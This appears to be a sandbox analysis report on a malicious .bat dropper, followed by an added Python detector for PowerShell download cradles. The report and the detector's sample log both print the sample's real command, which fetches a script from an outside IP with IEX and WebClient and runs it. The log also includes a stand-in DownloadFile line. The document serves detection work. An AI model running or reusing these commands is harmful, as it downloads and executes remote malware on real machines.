Analysis

Max time kernel: 114s
Max time network: 137s
Platform: windows10_x64
Resource: win10v200430
Submitted: 08-06-2020 00:10
Static task: static1

Behavioral task: behavioral1
Sample: 834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Resource: win7v200430 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: 834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Resource: win10v200430 (windows10_x64)
0 signatures, 0 seconds
General

Target: 834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Size: 219B
MD5: 9aeae02203b8a1236ef5aa06a8df49df
SHA1: f33e529e1dd812bd81e80fcc6b08c5d019184c74
SHA256: 4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7
SHA512: fdfe723f2cbf8c3f3b1a8b4211955bc60bf24f98ac81a719821e52ed5883cbdbf8b872107b5b4ae1ae5f3a6477f201f59c9452641624f4f06a61358b8013dc6e
Score: 10/10
Malware Config

Extracted
  Language  Source  URLs
  ps1               ps1.dropper  http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3688  2812        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3688  WerFault.exe
  Token: SeBackupPrivilege   3688  WerFault.exe
  Token: SeDebugPrivilege    3688  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3688  WerFault.exe (14 occurrences)

Note: every signature above is raised by WerFault.exe (PID 3688), the crash handler spawned for powershell.exe (PID 2812). Privilege adjustment and process enumeration by WerFault are consistent with crash-dump collection, not with payload behaviour; the report records no activity from the script fetched via the ps1.dropper URL, because powershell.exe crashed before any was observed.
Processes

1. C:\Windows\system32\cmd.exe (PID 2532)
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2812)
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe (PID 3688)
         C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
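The part of this process tree worth turning into a detection is the PowerShell download cradle: a .bat run by cmd.exe launches the 32-bit PowerShell from SysWOW64 on a 64-bit host, fetches a script from the ps1.dropper URL with WebClient.DownloadString, hands it to IEX, calls Invoke-XMIUQZERWSSC (a function the fetched script presumably defines), and sleeps. The following is an added example, not part of the sandbox report or its tooling: a Python detector run over constructed process-creation records. The "Key=Value|Key=Value" export format is assumed for the example; the PIDs, images and command lines of records 2532, 2812 and 3688 are taken from the report, while the parent PID 1000 and the two benign PowerShell records are invented to show what is and is not flagged.

```python
"""Flag PowerShell download cradles in process-creation records.

Added example (not the sandbox's own code). Input is a constructed
'Key=Value|Key=Value' export with ProcessId, ParentProcessId, Image and
CommandLine fields; values are assumed not to contain '|'.
"""
import re
from dataclasses import dataclass, field

# The report's cradle: IEX (New-Object System.Net.WebClient).DownloadString('http://...')
# PowerShell is case-insensitive and whitespace-tolerant, so the patterns are too.
IEX_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
WEBCLIENT_RE = re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I)
DOWNLOAD_RE = re.compile(r"\.Download(?:String|Data|File)\s*\(", re.I)
URL_RE = re.compile(r"""['"](https?://[^'"\s]+)['"]""", re.I)
WOW64_RE = re.compile(r"\\SysWOW64\\WindowsPowerShell\\", re.I)


@dataclass
class Finding:
    pid: int
    parent_pid: int
    severity: str
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)


def parse_event(line):
    """Parse one 'Key=Value|Key=Value' record into a dict (constructed format)."""
    rec = {}
    for kv in line.split("|"):
        key, _, value = kv.partition("=")
        rec[key.strip()] = value.strip()
    return rec


def inspect(rec):
    """Return a Finding for a suspicious PowerShell record, or None."""
    image = rec.get("Image", "")
    cmd = rec.get("CommandLine", "")
    if "powershell" not in image.lower():
        return None
    reasons, severity = [], "low"
    downloads = bool(WEBCLIENT_RE.search(cmd) or DOWNLOAD_RE.search(cmd))
    if downloads and IEX_RE.search(cmd):
        # Remote script fetched and executed in memory: the report's pattern.
        reasons.append("IEX + WebClient download cradle")
        severity = "high"
    elif downloads:
        # Download to disk with no in-memory invocation: weaker signal.
        reasons.append("WebClient download without in-memory invocation")
    if WOW64_RE.search(image):
        # 32-bit PowerShell on a 64-bit host, as in the report's process tree.
        reasons.append("32-bit PowerShell launched from SysWOW64")
        if severity != "high":
            severity = "medium"
    if not reasons:
        return None
    return Finding(int(rec["ProcessId"]), int(rec["ParentProcessId"]),
                   severity, reasons, URL_RE.findall(cmd))


def scan(lines):
    """Run inspect() over every record and return findings in log order."""
    findings = []
    for line in lines:
        f = inspect(parse_event(line))
        if f:
            findings.append(f)
    return findings


# Constructed records. PIDs 2532, 2812 and 3688 and their command lines mirror
# the report; parent PID 1000 and the last two benign records are invented.
SAMPLE_LOG = [
    r"ProcessId=2532|ParentProcessId=1000|Image=C:\Windows\system32\cmd.exe"
    r'|CommandLine=C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"',
    r"ProcessId=2812|ParentProcessId=2532|Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    r"""|CommandLine=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000" """,
    r"ProcessId=3688|ParentProcessId=2812|Image=C:\Windows\SysWOW64\WerFault.exe"
    r"|CommandLine=C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 704",
    r"ProcessId=4100|ParentProcessId=1000|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r'|CommandLine=powershell.exe -Command "Get-Process; Get-Service"',
    r"ProcessId=4120|ParentProcessId=1000|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"""|CommandLine=powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.zip','C:\a.zip')" """,
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] pid={f.pid} parent={f.parent_pid} urls={f.urls} reasons={f.reasons}")
```

Matching on the literal `DownloadString` and `New-Object Net.WebClient` is brittle: the same cradle can be written with Invoke-WebRequest, passed through `-EncodedCommand`, or assembled by string concatenation, none of which this command-line check sees. In production, pair a launcher-level rule like this with PowerShell Script Block Logging (Event ID 4104), which records the decoded script as it executes rather than the text on the command line.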